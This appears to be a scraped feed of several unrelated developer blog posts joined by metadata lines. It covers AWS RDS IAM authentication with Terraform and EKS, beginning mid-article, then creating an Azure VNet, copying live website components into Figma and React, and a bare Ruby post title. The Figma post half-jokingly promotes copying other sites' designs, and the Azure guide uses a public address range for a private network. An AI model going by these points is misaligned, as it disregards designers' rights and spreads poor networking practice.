So, we have an already created RDS PostgreSQL instance with _Password and IAM database authentication_ enabled:

![](https://cdn-images-1.medium.com/max/406/0*QtBEKmfq3rtyOoIi.png)

For the server, we already have a default master user and password in AWS Secrets Manager; you will need it to add a new user in the RDS.

Find the instance ID, as it will be needed in the IAM Policy:

![](https://cdn-images-1.medium.com/max/678/0*J0pasgdrvJ4gzWjz.png)

### Creating an IAM Policy

Next, we need an IAM Policy that will allow our future user access to this RDS instance. Go to IAM > Policies and create a new policy; see the documentation [Creating and using an IAM policy for IAM database access](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html):

```
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "rds-db:connect",
            "Resource": "arn:aws:rds-db:us-east-1:492***148:dbuser:db-UZM***3SA/db_test"
        }
    ]
}
```

Here, we `Allow` the `rds-db:connect` action on the database server in `Resource` using the `db_test` username. Later, we will add the same `db_test` user by running the `CREATE USER` command on the database server itself.

Note that it is not the RDS instance name that is set here, but its ID: `db-XXXYYYZZZ`.

Save the Policy:

![](https://cdn-images-1.medium.com/max/877/0*upS8InO3mliRzvp5.png)

You can connect this Policy directly to your AWS IAM User or use an IAM Role. We'll try with an IAM Role later when we connect a Kubernetes Pod, but for now, let's use a regular IAM User to test the mechanism in general.

Find the required IAM User and add permissions:

![](https://cdn-images-1.medium.com/max/1024/0*cjOGCZJxJZ3367JG.png)

Select _Attach policies directly_, and find our IAM Policy:

![](https://cdn-images-1.medium.com/max/1024/0*rpQJk0XMyxSdIwcZ.png)

The next step is to add the user to RDS.

### PostgreSQL: creating a database user

Documentation: [Creating a database account using IAM authentication](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.DBAccounts.html).

> **Note**: Make sure the specified database user name is the same as a resource in the IAM policy for IAM database access

That is, when running `CREATE USER`, we must specify the same `db_test` user name that is specified in the `"Resource"` of our IAM Policy:

```
...
"Resource": "arn:aws:rds-db:us-east-1:492***148:dbuser:db-UZM***3SA/db_test"
...
```

Connect with the default user and password that you received when the RDS instance was created:

```
$ psql -h ops-monitoring-rds.***.us-east-1.rds.amazonaws.com -U master_user -d ops_monitoring_db
```

Create a new user `db_test`, and set up its authentication through the `rds_iam` PostgreSQL role:

```
ops_grafana_db=> CREATE USER db_test;
CREATE ROLE
ops_grafana_db=> GRANT rds_iam TO db_test;
GRANT ROLE
```

For MariaDB, it would be the `AWSAuthenticationPlugin`.

### Connecting with `psql`

Documentation: [Connecting to your DB instance using IAM authentication from the command line: AWS CLI and psql client](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.Connecting.AWSCLI.PostgreSQL.html).
**_Note_**: _You cannot use a custom Route 53 DNS record instead of the DB instance endpoint to generate the authentication token._

Find the URL of the server's endpoint:

![](https://cdn-images-1.medium.com/max/464/0*53MiGiQCuWIE6m0-.png)

Set a variable with the address:

```
$ export RDSHOST="ops-monitoring-rds.***.us-east-1.rds.amazonaws.com"
```

Using the AWS CLI and the `aws rds generate-db-auth-token` command, get a token; this will be our password:

```
$ export PGPASSWORD="$(aws --profile work rds generate-db-auth-token --hostname $RDSHOST --port 5432 --region us-east-1 --username db_test)"
```

Check its content:

```
$ echo $PGPASSWORD
ops-monitoring-rds.***.us-east-1.rds.amazonaws.com:5432/?Action=connect&DBUser=db_test&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=***%2F20240624%2Fus-east-1%2Frds-db%2Faws4_request&X-Amz-Date=20240624T142442Z&X-Amz-Expires=900&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQo***942
```

And connect to the RDS:

```
$ psql "host=$RDSHOST sslmode=require dbname=ops_grafana_db user=db_test password=$PGPASSWORD"
psql: error: connection to server at "ops-monitoring-rds.***.us-east-1.rds.amazonaws.com" (10.0.66.79), port 5432 failed: FATAL: PAM authentication failed for user "db_test"
```

### FATAL: PAM authentication failed for user "db_test"

In my case, the error occurred because I first generated the token with "`--region us-west-2`", while the RDS server is located in `us-east-1` (hello, copy-paste from the documentation :-) ).

That is, the error occurs precisely because of errors in the access settings: either a different username is specified in the IAM Policy, a different name was used during `CREATE USER`, or a token is generated for a different IAM role.

Let's regenerate the token and try again:

```
$ psql "host=$RDSHOST sslmode=require dbname=ops_grafana_db user=db_test password=$PGPASSWORD"
psql (16.2, server 16.3)
SSL connection (protocol: TLSv1.3, cipher: TLS_AES_256_GCM_SHA384, compression: off)
Type "help" for help.

ops_grafana_db=> \dt
                List of relations
 Schema |            Name              | Type  |      Owner
--------+------------------------------+-------+------------------
 public | alert                        | table | ops_grafana_user
 public | alert_configuration          | table | ops_grafana_user
 public | alert_configuration_history  | table | ops_grafana_user
...
```

Moreover, the `password=$PGPASSWORD` part can be omitted: `psql` will read the `$PGPASSWORD` variable itself, see [Environment Variables](https://www.postgresql.org/docs/current/libpq-envars.html#LIBPQ-ENVARS).

`dbname=ops_grafana_db` is here because the server was created for Grafana, and this is its database.

Okay, we checked it, and it works. Now it's time for Kubernetes and automation with Terraform, and our adventures are just beginning.

### Terraform, AWS EKS Pod Identity, and IAM database authentication

Let's see how this mechanism will work with Kubernetes Pods and ServiceAccounts. I wrote more about the new scheme of working with Pod ServiceAccounts and IAM in [AWS: EKS Pod Identities — a replacement for IRSA? Simplifying IAM Access Management](https://rtfm.co.ua/en/aws-eks-pod-identities-a-replacement-for-irsa-simplifying-iam-access-management/), but I haven't used it in production yet.

So, what do we need?
- an IAM Role with an IAM Policy
- in the Trusted Policy of this IAM Role we will have `pods.eks.amazonaws.com`
- we will add the IAM Role to an EKS cluster via the EKS IAM API
- we will create a Kubernetes Pod and a ServiceAccount
- in the Pod, we'll have Python code that will connect to RDS

That is, the Kubernetes Pod will use the IAM Role from the Kubernetes ServiceAccount to authenticate to the AWS API; then, using this role, it will receive an AWS RDS Token from the AWS API, and with this token, it will connect to RDS.

### Creating AWS EKS Pod Identity with Terraform

There is a module for AWS EKS Pod Identity, [`eks-pod-identity`](https://registry.terraform.io/modules/terraform-aws-modules/eks-pod-identity/aws/latest?tab=inputs), so let's use it.

In Terraform, describe an `aws_iam_policy_document` with access to RDS:

```
data "aws_iam_policy_document" "monitoring_rds_policy" {
  statement {
    effect = "Allow"

    actions = [
      "rds-db:connect"
    ]

    resources = [
      "arn:aws:rds-db:us-east-1:${data.aws_caller_identity.current.account_id}:dbuser:${module.monitoring_rds.db_instance_resource_id}/test_user"
    ]
  }
}
```

The IAM Policy is new, and we'll use a new user, `test_user`.

In the `${data.aws_caller_identity.current.account_id}` we have our AWS account ID:

```
data "aws_caller_identity" "current" {}
```

And in the `${module.monitoring_rds.db_instance_resource_id}`, the ID of our RDS instance, which was created using the [terraform-aws-modules/rds/aws](https://registry.terraform.io/modules/terraform-aws-modules/rds/aws/latest) module with the `iam_database_authentication_enabled` = true parameter:

```
module "monitoring_rds" {
  source  = "terraform-aws-modules/rds/aws"
  version = "~> 6.7.0"

  identifier = "${var.environment}-monitoring-rds"

  ...

  # DBName must begin with a letter and contain only alphanumeric characters
  db_name  = "${var.environment}_grafana_db"
  username = "${var.environment}_grafana_user"
  port     = 5432

  manage_master_user_password          = true
  manage_master_user_password_rotation = false

  iam_database_authentication_enabled = true

  ...
}
```

Next, with [terraform-aws-modules/eks-pod-identity/aws](https://registry.terraform.io/modules/terraform-aws-modules/eks-pod-identity/aws/latest?tab=inputs) we describe an EKS Pod Identity Association, where we use the `aws_iam_policy_document.monitoring_rds_policy` that we created above:

```
module "grafana_pod_identity" {
  source  = "terraform-aws-modules/eks-pod-identity/aws"
  version = "~> 1.2.1"

  name = "${var.environment}-monitoring-rds-role"

  attach_custom_policy    = true
  source_policy_documents = [data.aws_iam_policy_document.monitoring_rds_policy.json]

  associations = {
    atlas-eks = {
      cluster_name    = data.aws_eks_cluster.eks.name
      namespace       = "${var.environment}-monitoring-ns"
      service_account = "eks-test-sa"
    }
  }
}
```

In the `namespace` we specify the Namespace in which the ServiceAccount for the Pod will be created, and in the `service_account`, the actual name of the ServiceAccount.
`data.aws_eks_cluster.eks.name` is retrieved from the [`data "aws_eks_cluster"`](https://registry.terraform.io/providers/hashicorp/aws/latest/docs/data-sources/eks_cluster) data source:

```
# get info about a cluster
data "aws_eks_cluster" "eks" {
  name = local.eks_name
}
```

Deploy it and check the IAM:

![](https://cdn-images-1.medium.com/max/1024/0*XeIfJAalIrnlxC0A.png)

And the Pod Identity associations in the AWS EKS cluster:

![](https://cdn-images-1.medium.com/max/1024/0*xnnv0PjT48SpOiGI.png)

Now we have an IAM Role with the IAM Policy attached which grants the `test_user` user access to the RDS instance with the ID `db-UZM***3SA`, and we have an established relationship between the ServiceAccount named `eks-test-sa` in the Kubernetes cluster and this IAM Role.

### Python, PostgreSQL, and IAM database authentication

What should happen next:

- we'll create a Kubernetes Pod
- create a ServiceAccount with the name `eks-test-sa`
- write Python code that will:
  - connect to the AWS API using the ServiceAccount and the associated IAM Role
  - receive an AWS RDS Token
  - use this token to connect to RDS

Log in to RDS with the master user again, and create a new user `test_user` (as specified in the IAM Policy) with the role `rds_iam`:

```
ops_grafana_db=> CREATE USER test_user;
CREATE ROLE
ops_grafana_db=> GRANT rds_iam TO test_user;
GRANT ROLE
ops_grafana_db=> GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO test_user;
GRANT
```

Create a Kubernetes manifest with the `eks-test-sa` ServiceAccount and a Kubernetes Pod that will use that ServiceAccount in the `namespace=ops-monitoring-ns`:

```
apiVersion: v1
kind: ServiceAccount
metadata:
  name: eks-test-sa
  namespace: ops-monitoring-ns
---
apiVersion: v1
kind: Pod
metadata:
  name: eks-test-pod
  namespace: ops-monitoring-ns
spec:
  containers:
    - name: ubuntu
      image: ubuntu
      command: ['sleep', '36000']
  restartPolicy: Never
  serviceAccountName: eks-test-sa
```

Deploy:

```
$ kk apply -f eks-test-rds-irsa.yaml
serviceaccount/eks-test-sa created
pod/eks-test-pod created
```

Connect to the Pod:

```
$ kk exec -ti eks-test-pod -- bash
root@eks-test-pod:/#
```

Install the `python3-boto3` library to get a token from the code, and the `python3-psycopg2` library to work with PostgreSQL:

```
root@eks-test-pod:/# apt update && apt -y install vim python3-boto3 python3-psycopg2
```

Write the code:

```
#!/usr/bin/python3

import boto3
import psycopg2

DB_HOST = "ops-monitoring-rds.***.us-east-1.rds.amazonaws.com"
DB_USER = "test_user"
DB_REGION = "us-east-1"
DB_NAME = "ops_grafana_db"

client = boto3.client('rds')

# using the Kubernetes Pod ServiceAccount's IAM Role, generate an IAM token to access RDS
db_token = client.generate_db_auth_token(DBHostname=DB_HOST, Port=5432, DBUsername=DB_USER, Region=DB_REGION)

# connect to RDS using the token as a password
conn = psycopg2.connect(database=DB_NAME, host=DB_HOST, user=DB_USER, password=db_token, port="5432")

cursor = conn.cursor()
cursor.execute("SELECT * FROM dashboard_provisioning")
print(cursor.fetchone())

conn.close()
```

Basically, it's quite simple: connect to AWS, get a token, and connect to RDS.
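One practical note, visible in the `X-Amz-Expires=900` field of the token we echoed earlier: a generated token is only valid for 15 minutes, so a long-running service should generate a fresh token for every new connection rather than caching one. A hedged sketch of that pattern, reusing the names from the script above:

```
def get_connection():
    # regenerate the token on every connect: RDS auth tokens expire after 15 minutes
    token = client.generate_db_auth_token(DBHostname=DB_HOST, Port=5432,
                                          DBUsername=DB_USER, Region=DB_REGION)
    return psycopg2.connect(database=DB_NAME, host=DB_HOST,
                            user=DB_USER, password=token, port="5432")
```

Anyway, back to our simple test script.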
Run it and check the result:

```
root@eks-test-pod:/# ./test-rds.py
(1, 1, 'default', '/var/lib/grafana/dashboards/default/nodeexporter.json', 1719234200, 'c2ef5344baf3389f5238679cd1b0ca68')
```

A bit about what exactly happens "under the hood":

- the Kubernetes Pod has a ServiceAccount
- the ServiceAccount is associated with the `ops-monitoring-rds-role` IAM Role via Pod Identity associations
- the `ops-monitoring-rds-role` IAM Role has an IAM Policy with the Allow on `rds-db:connect`
- the Kubernetes Pod uses that IAM Role from the ServiceAccount for authentication and authorization in AWS
- then the Python code gets an RDS Token with `boto3` and `client.generate_db_auth_token`
- and uses it to connect to PostgreSQL

On the RDS side, we already have the `test_user` user created with the `rds_iam` role and permissions on the databases.

For more information on how Kubernetes ServiceAccounts and tokens work at the Kubernetes Pod level, see [AWS: EKS, OpenID Connect, and ServiceAccounts](https://rtfm.co.ua/en/aws-eks-openid-connect-and-serviceaccounts/) (it was written before Pod Identity associations, but the mechanism is the same).

So, the solution we just tried looks like a good option, but there is one more thing.

### Terraform and IAM RDS Authentication: the problems

In general, the Terraform setup described above seems to work, but we created `test_user` and gave it permissions manually. And here's another drawback of the RDS and IAM database authentication scheme: we still need to create the user on the database server. This leads to another problem: how do we do that with Terraform?

I didn't spend any more time on it, because it's not really relevant for us: in my case, there will be only a few users, they can be created manually, and it doesn't block the current automation. But over time, when the project grows, this issue will still have to be addressed.

So, what problems and solutions do we have?
- we can create PostgreSQL (or MariaDB) users directly from Terraform code using the PostgreSQL provider, by running `local-exec`, or by using `resource "postgresql_grant"`; see examples in [AWS RDS IAM Authentication with Terraform](https://stackoverflow.com/questions/55834290/aws-rds-iam-authentication-with-terraform) and [grant privileges and permissions to a role via terraform is not working](https://stackoverflow.com/questions/72176299/grant-privileges-and-permissions-to-a-role-via-terrafrom-is-not-working) (a sketch of this approach is included at the end of this post)
- but this requires network access to the RDS instance itself, which runs in the private network of the VPC, so CI/CD needs network access to the VPC; this is possible if you run GitHub Runners (in our case) in Kubernetes, whose WorkerNodes have access to the private subnets, but we are currently using GitHub-hosted Runners, and they don't have this access
- the second option is to use an AWS Lambda function that runs in the VPC with network access to the RDS, and this function will run the PostgreSQL commands to create users; see examples in [Securing AWS RDS with Fine-Grained Access Control using IAM Authentication, Terraform and Serverless](https://ayltai.medium.com/securing-aws-rds-with-fine-grained-access-control-using-iam-authentication-terraform-and-27ddc83d661d) and [Automate post-database creation scripts or steps in an Amazon RDS for Oracle database](https://aws.amazon.com/blogs/database/automate-post-database-creation-scripts-or-steps-in-an-amazon-rds-for-oracle-database/)
- this seems to be a working option; also, instead of AWS Lambda, we can use Terraform to run a Kubernetes Pod which will perform the necessary actions: connect to RDS and `CREATE USER`

Both solutions are workable, and someday I may describe the implementation of one of them (most likely the second one, using Lambda or an EKS Pod). But currently, I don't see any point in spending time on it.

### Final conclusions

The conclusions are actually a bit ambiguous.

The idea of RDS IAM database authentication looks very interesting, but the fact that the RDS token and the regular authentication token in the AWS API for IAM Roles are different entities makes it a bit difficult to implement. If you could connect to RDS just using a ServiceAccount and an IAM Role, it would be much easier to use.

In addition, for some reason, I expected that authorization would be done at the IAM level, i.e., that in the IAM Policy we could specify at least the databases to which we want to grant access. But it remains at the database server level.

The second problem is that we still have to create a user in the RDS instance and set their permissions there, and that again creates additional difficulties in automation.

However, in general, RDS IAM database authentication fulfills its task: we really don't need to create a Kubernetes Secret with a password for the database and mount it into the Kubernetes Pod; instead, we can connect a ServiceAccount to the Pod and "pass the buck" to the developers, i.e., perform the authentication at the code level, not in Kubernetes.

_Originally published at_ [_RTFM: Linux, DevOps, and system administration_](https://rtfm.co.ua/en/aws-rds-iam-database-authentication-eks-pod-identities-and-terraform/)_._

* * *
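P.S. As referenced in the first bullet of the problems list above, here is a minimal, untested sketch of the PostgreSQL-provider approach. It assumes the cyrilgdn/postgresql provider and a runner with network access to the RDS endpoint; the `master_user` credentials, variable names, and module outputs are placeholders based on this post's examples:

```
# Requires network access to the RDS endpoint (e.g., a self-hosted runner in the VPC).
provider "postgresql" {
  host     = module.monitoring_rds.db_instance_address
  port     = 5432
  username = "master_user"           # master credentials, e.g., from Secrets Manager
  password = var.rds_master_password # hypothetical variable
  sslmode  = "require"
}

# Create the database user that the IAM Policy references.
resource "postgresql_role" "test_user" {
  name  = "test_user"
  login = true
}

# Equivalent of: GRANT rds_iam TO test_user;
resource "postgresql_grant_role" "test_user_rds_iam" {
  role       = postgresql_role.test_user.name
  grant_role = "rds_iam"
}
```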
setevoy
1,915,611
Create an Azure Virtual Network (VNet)
Contents Overview of Azure Virtual Network Steps to Creating Azure Virtual Network ...
0
2024-07-13T04:18:05
https://dev.to/celestina_odili/create-an-azure-virtual-network-vnet-48fp
virtualnet, azure, tutorial, cloudcomputing
Contents <a name="content"></a>

[Overview of Azure Virtual Network](#overview)

[Steps to Creating Azure Virtual Network](#create-vnet)

### Overview of Azure Virtual Network <a name="overview"></a>

Azure Virtual Network (VNet) is a versatile and powerful service that provides the flexibility, security, and scalability required to support a wide range of applications and workloads in the cloud. It enables users to securely connect Azure resources to each other, to the internet, and to on-premises networks. It serves as the backbone for networking within the Azure ecosystem, offering a range of features and capabilities that facilitate secure and efficient communication.

##### Key Features and Capabilities

- Isolation and Segmentation: VNets provide logical isolation within the Azure environment, allowing users to create multiple isolated networks. Each VNet is isolated from other VNets, providing a secure environment for deploying resources.
- Subnets: A subnet or subnetwork is a network inside a network. VNets can be divided into subnets to enable better organization and management of resources. Subnets can also be used to apply network security policies and route network traffic.
- Network Security Groups (NSGs): NSGs allow users to control inbound and outbound traffic to and from network interfaces, VMs, and subnets. They act as virtual firewalls, providing granular control over network traffic.
- Azure Firewall: A managed, cloud-based network security service that protects Azure Virtual Network resources. It allows users to define, enforce, and log application and network connectivity policies.
- VPN Gateway: This service enables secure cross-premises connectivity between the VNet and on-premises infrastructure through a secure VPN tunnel. It supports both site-to-site and point-to-site configurations.
- ExpressRoute: Provides a dedicated, private connection between Azure datacenters and on-premises infrastructure or colocation environments. It offers higher security, reliability, and faster speeds compared to typical internet connections.
- Peering: VNet peering allows VNets to communicate with each other directly through the Azure backbone network, enabling low-latency, high-bandwidth connectivity between VNets in the same region or across regions.
- Load Balancing: Azure Load Balancer and Application Gateway provide scalable and high-availability network services. They distribute incoming network traffic across multiple servers to ensure reliability and optimal performance.
- DNS Services: Azure DNS hosts domain names and resolves DNS queries using Microsoft’s global network of name servers, ensuring high performance and availability.
- DDoS Protection: Azure DDoS Protection safeguards applications by scrubbing traffic at the Azure network edge before it can affect service availability.

##### Use Cases

- Hybrid Cloud Deployments: Securely extend on-premises networks to Azure, enabling a hybrid cloud environment that leverages the benefits of both on-premises and cloud resources.
- Multi-Tier Applications: Deploy multi-tier applications with isolated network environments for different tiers (e.g., web, application, and database tiers) to enhance security and manageability.
- Disaster Recovery: Utilize VNets for disaster recovery setups, ensuring that critical applications and data can be quickly recovered in the event of a failure.
- Big Data and Analytics: Deploy big data and analytics solutions, connecting various services and resources securely within the VNet for efficient data processing and analysis.

[back to top](#content)

### Steps to Creating Azure Virtual Network <a name="create-vnet"></a>

This guide will create an Azure virtual network with four subnets using the address space 192.148.30.0/26 for company XYZ. The four subnets represent four departments in the company: ICT, Sales, Audit, and Account. A /26 block contains 64 addresses, which divides exactly into four /28 subnets of 16 addresses each. Below is a step-by-step guide:

##### Step 1: Log in to the Azure Portal

- On your web browser, type portal.azure.com to go to the Azure Portal login page.
- Log in with your Azure account credentials or click [here](https://azure.microsoft.com/en-us/free) to create a free account if you do not have one yet.

##### Step 2: Create a Virtual Network

- On the Azure Portal search bar, type Virtual Network and select Virtual Network from the list.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/gko2eqserexigdzdtrri.jpg)

- Click Create.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tk4ao8yotpfvir2ltmx7.jpg)

##### Step 3: Configure the Virtual Network Basics

In the Basics tab, fill in the following details:
- Subscription: Select the subscription to use.
- Resource group: Create a new resource group or select an existing one.
- Name: Enter a name for the VNet (example: XYZ-VNet).
- Region: Select the region where you want to create the VNet.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/ng1m3qbd0txvy9nn559f.jpg)

##### Step 4: Configure the Address Space

- Click on the IP Addresses tab.
- Under IPv4 address space, enter 192.148.30.0 in the Address space field and select /26 in the CIDR field, then delete the default subnet and add your own subnets.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t4x6clqe63fusajobjs0.jpg)

##### Step 5: Add Subnets

Add four subnets for the ICT, Sales, Audit, and Account departments.

**For ICT Subnet:**
Under the Subnets section of the address space,
1. Click on + Add subnet. On the Add subnet screen,
2. Enter or select values for the subnet settings. For example, enter the following details:
- Subnet name: ICT
- Starting address: 192.148.30.0
- Size: select /28
- Click Add

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kv93w0z55b16psnfk4fn.jpg)

**For Sales Subnet:**
- Click on + Add subnet
- Subnet name: Sales
- Starting address: 192.148.30.16
- Size: /28
- Click Add

Do the same for the other two subnets with the following details:

**For Audit Subnet:**
- Subnet name: Audit
- Starting address: 192.148.30.32
- Size: /28
- Click Add

**For Account Subnet:**
- Subnet name: Account
- Starting address: 192.148.30.48
- Size: /28
- Click Add

##### Step 6: Review and Create the VNet

Once all subnets are added,
- Click on the Review + create button at the bottom of the page.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/kbvfy6r4s0dtq2w5m7kb.jpg)

- Review the settings to ensure everything is configured correctly.
- Click Create to deploy the Virtual Network.

##### Step 7: Verify the Deployment

- After the deployment is complete, click Go to resource to see the overview.

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/65mjqvg2nl5zbnifxv1k.jpg)

Ensure that the subnets are created with the correct address ranges.
- On the left pane, click Settings
- Select Subnets

![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8d563w6s8la87h1uyx9j.jpg)

_By the way, if this is for practice only, endeavor to delete the virtual network after creating it to avoid unnecessary costs._

[back to top](#content)
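If you prefer scripting the same setup, the equivalent Azure CLI commands are shown below. This is a minimal sketch, assuming an existing resource group with the hypothetical name XYZ-RG and the address plan from the steps above:

```bash
# create the VNet with the /26 address space (assumes resource group XYZ-RG already exists)
az network vnet create \
  --resource-group XYZ-RG \
  --name XYZ-VNet \
  --address-prefixes 192.148.30.0/26

# one /28 subnet per department
az network vnet subnet create --resource-group XYZ-RG --vnet-name XYZ-VNet \
  --name ICT --address-prefixes 192.148.30.0/28
az network vnet subnet create --resource-group XYZ-RG --vnet-name XYZ-VNet \
  --name Sales --address-prefixes 192.148.30.16/28
az network vnet subnet create --resource-group XYZ-RG --vnet-name XYZ-VNet \
  --name Audit --address-prefixes 192.148.30.32/28
az network vnet subnet create --resource-group XYZ-RG --vnet-name XYZ-VNet \
  --name Account --address-prefixes 192.148.30.48/28
```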
celestina_odili
1,915,757
Easily copy any Live website to Figma and then to your App
Picasso was quoted saying “good artists borrow, great artists steal.” I totally agree with this...
0
2024-07-14T13:40:59
https://dev.to/dellboyan/easily-copy-any-live-website-to-figma-and-then-to-your-app-436d
webdev, javascript, programming, ai
Picasso was quoted saying “good artists borrow, great artists steal.” I totally agree with this point: I think you should steal whenever there's an opportunity to do so easily, and in this post, I'll show you how you can straight up steal any design you want.

I'm just kidding, stealing is wrong and blah blah, we should all be decent human beings and respect each other, but let's explore a method for easily grabbing any component you want from a website and adjusting it for your project and use case.

Let's say you are browsing a cool website and you see a date picker component or a profile card that you like. With this approach you can have that component in your app in less than a couple of minutes.

The first tool we'll use is [html.to.design](https://html.to.design/home). This is a really cool tool that allows us to select any section of a website and open it inside Figma. You'll need to install their [Google Chrome extension](https://chromewebstore.google.com/detail/htmltodesign/ldnheaepmnmbjjjahokphckbpgciiaed?hl=en) and [Figma plugin](https://www.figma.com/community/plugin/851183094275736358/figma-to-html) as well.

The first step is to find a component you would like to copy. I was browsing the awwwards.com directory and thought I might copy a component from one website.

To save a certain section inside Figma, click on the html.to.design Chrome extension, then on Selection (or press Alt+Shift+D), and just select the component you want.

![html.to.design chrome extension](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/sr7lsvbfdlhos1zvyplm.png)

![Awwwards Directory](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/83t7lg33couy8tbrnk41.png)

Once you click on a selection, it will automatically download a file that you can import inside Figma. Next up, open Figma and, from plugins, click on html.to.design. Once the plugin opens up, select the file you just downloaded and check all the fields.

![html.to.design figma plugin](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/urz9hnqv2zbm00esndrs.png)

![html.to.design figma plugin options](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/2hmjh4iitkls9oejtbz7.png)

Finally click on Go, and you will get your component loaded up inside Figma. Sometimes it will not match the design 100%, but I tested a couple of these plugins and found that this one works the best. Feel free to fix any styling that didn't import correctly and modify the design to your liking. In my case the import was not 100% correct and I had to fix a table.

![Loaded figma design with bugs](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/4mkdfutn6jx1glmb8lda.png)

After I fixed this table, the component was perfect and ready for export.

![Fixed component](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/95jc3ee7ijxng7gvzq2y.png)

To get the code for this component we will use another [plugin for Figma from Builder.io](https://www.figma.com/community/plugin/747985167520967365/builder-io-ai-powered-figma-to-code-react-vue-tailwind-more). Just like with html.to.design, there are many Figma plugins for getting code from a design. From my experience none of them work perfectly; this one from Builder.io is also not perfect, but I've found it works the best of all of them.

![Builder.io Figma plugin](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wlj07czjmpulsyzgn72y.png)

Just open up the plugin, select the entire component in Figma and click on Generate code.
It will open up the Builder.io website with your design; this tool will generate the entire code for your component.

![Builder.io Dashboard](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xruj9vftjjw7wbjf8v1x.png)

Inside the Builder.io dashboard you can choose to generate code with React, Qwik, Vue, Svelte, React Native, Angular, HTML, Mitosis, Solid, and Marko, with styling in Tailwind or CSS. You are also able to edit the component with their editor.

Once I generated the code I got three components: ProfileCard.tsx, which contains InfoRow.tsx and AwardCounter.tsx. Let's examine them:

ProfileCard.tsx:

```tsx
import React from "react";
import AwardCounter from "@/components/AwardCounter";
import InfoRow from "@/components/InfoRow";

interface ProfileCardProps {
  imageUrl: string;
  avatarUrl: string;
  name: string;
  isPro: boolean;
  location: string;
  website: string;
  awards: {
    type: string;
    count: number;
  }[];
}

const ProfileCard: React.FC<ProfileCardProps> = ({
  imageUrl,
  avatarUrl,
  name,
  isPro,
  location,
  website,
  awards,
}) => {
  return (
    <article className="flex flex-col bg-white rounded-lg max-w-[435px]">
      <img
        loading="lazy"
        src={imageUrl}
        alt="Profile cover"
        className="w-full aspect-[1.33]"
      />
      <header className="flex gap-3 self-start mt-8 ml-8 text-neutral-800">
        <img
          loading="lazy"
          src={avatarUrl}
          alt={`${name}'s avatar`}
          className="shrink-0 aspect-square w-[60px]"
        />
        <div className="flex gap-0.5 justify-between my-auto">
          <h1 className="text-2xl font-bold leading-6">{name}</h1>
          {isPro && <span className="text-xs font-medium leading-6">PRO</span>}
        </div>
      </header>
      <InfoRow label="Location" value={location} />
      <InfoRow label="Website" value={website} />
      <section className="px-8 py-7 w-full border-t border-gray-200 border-solid">
        <div className="flex gap-5 max-md:flex-col max-md:gap-0">
          <h2 className="text-sm font-bold leading-5 text-neutral-800 w-[44%] max-md:w-full">
            Awards
          </h2>
          <div className="flex grow gap-0 self-stretch text-center whitespace-nowrap text-neutral-800 w-[56%] max-md:w-full">
            {awards.map((award, index) => (
              <AwardCounter
                key={index}
                type={award.type}
                count={award.count}
                isLast={index === awards.length - 1}
              />
            ))}
          </div>
        </div>
      </section>
    </article>
  );
};

export default ProfileCard;
```

InfoRow.tsx

```tsx
import React from "react";

interface InfoRowProps {
  label: string;
  value: string;
}

const InfoRow: React.FC<InfoRowProps> = ({ label, value }) => {
  return (
    <div className="flex gap-5 justify-between px-8 py-7 w-full border-t border-gray-200 border-solid text-neutral-800">
      <div className="text-base font-bold leading-5">{label}</div>
      <div className="text-sm font-light leading-5">{value}</div>
    </div>
  );
};

export default InfoRow;
```

AwardCounter.tsx

```tsx
import React from "react";

interface AwardCounterProps {
  type: string;
  count: number;
  isLast: boolean;
}

const AwardCounter: React.FC<AwardCounterProps> = ({ type, count, isLast }) => {
  const borderClasses = isLast
    ? "rounded-none border border-solid border-neutral-800"
    : "border-t border-b border-l border-solid border-neutral-800";

  return (
    <div className={`flex flex-col py-px pl-px ${borderClasses}`}>
      <div className="text-xs font-medium leading-4">{type}</div>
      <div className="px-2 pt-3 pb-3 mt-1.5 text-xs font-bold leading-4 border-t border-solid border-neutral-800">
        {count}
      </div>
    </div>
  );
};

export default AwardCounter;
```

When I import the ProfileCard component inside my page, this is what I get.
```tsx
import ProfileCard from "@/components/ProfileCard";

export default function Home() {
  return (
    <div className="flex flex-col h-screen">
      <ProfileCard
        imageUrl="https://assets.awwwards.com/awards/avatar/87991/6656d09421dac549404842.png"
        avatarUrl="https://assets.awwwards.com/awards/media/cache/thumb_user_retina/avatar/87991/620f9ee354b1b133493338.jpeg"
        name="Red Collar"
        isPro={true}
        website="https://redcollar.com"
        location="Los Angeles, CA"
        awards={[
          { type: "BW", count: 5 },
          { type: "MB", count: 19 },
          { type: "APP", count: 3 },
        ]}
      />
    </div>
  );
}
```

As you can see, the code Builder.io generated created a reusable component with props already defined, which is quite impressive! The end result looks like this:

![Generated component with Builder.io](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/oci13bpyb7sud1o84gjs.png)

This might seem like a long post, but the entire process took a couple of minutes. I'm not saying you should steal designs from other websites, but you can use this method to speed up your workflow when you are inspired by a design you saw. You can also use the Builder.io plugin to convert your own Figma designs much faster, or to test how a certain component might fit into your designs.

Sometimes I use this method to convert simpler components from Figma into code and then adjust them; I've found it speeds up my workflow, so hopefully it can help you too. I'm interested to hear what you think of this approach and whether it makes sense for you. Feel free to comment below.

[Let's connect on x.com](https://x.com/DellBoyan)
dellboyan
1,915,771
Create a String to Color Helper with Ruby (and Rails)
